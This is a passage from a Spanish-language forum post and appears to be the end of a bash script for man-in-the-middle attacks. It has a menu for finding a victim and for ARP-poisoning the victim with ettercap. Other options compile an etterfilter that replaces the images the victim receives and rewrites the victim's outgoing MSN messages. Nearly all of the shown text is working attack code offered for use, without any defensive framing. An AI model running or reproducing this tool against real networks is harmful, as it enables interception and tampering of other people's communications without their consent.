xterm -e sudo sed -ie 's/kaka/'$convfalsa1'/g' mitmsg.filter &
rm mitmsg.filtere
sleep 1
echo "Creando el filtro..."
xterm -e etterfilter mitmsg.filter -o msg.ef &
echo "--------------------------------------------> OK"
rm mitmsg.filter
mv mitmsg.filter1 mitm.filter
echo "Iniciando ataque..."
xterm -hold -e ettercap -i $interface -T -q -F msg.ef -M ARP /$penlaces/ // &
echo "--------------------------------------------> OK"
sleep 1
}

while [ $quit != "yes" ]
do
clear
echo "------------------------------------------------"
echo "     AQQLE  /     AQQLE /    AQQLE /     AQQLE/"
echo "AQQLE/     /AQQLE/     /AQQLE /   /AQQLE/    /"
echo "    / AQQLE     /AQQLE/      /AQQLE    / AQQLE"
echo "------------------------------------------------"
echo ""
echo "Menú de opciones MITM"
echo "================================================"
echo "1.  Configuración necesaria para el ataque MITM"
echo "------------------------------------------------"
echo "2.  Buscar víctima"
echo "3.  Iniciar ataque MITM"
echo "4.  Cambiar las imagenes entrantes a la víctima"
echo "5.  Cambiar las conversaciones de msn salientes"
echo "------------------------------------------------"
echo "0. Salir"
echo "------------------------------------------------"
echo -n "Escoje acción: "
read eleccio
case $eleccio in
1) configuracion_todo;;
2) busc_victima;;
3) inic_mitm;;
4) camb_imagen;;
5) camb_msn;;
0) salida_x;
quit="yes";;
*) echo "\"$eleccio\" Porfavor escoja un número del 0 al 5..."
sleep 2 ;;
esac
done
Saludos!  :silbar:
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines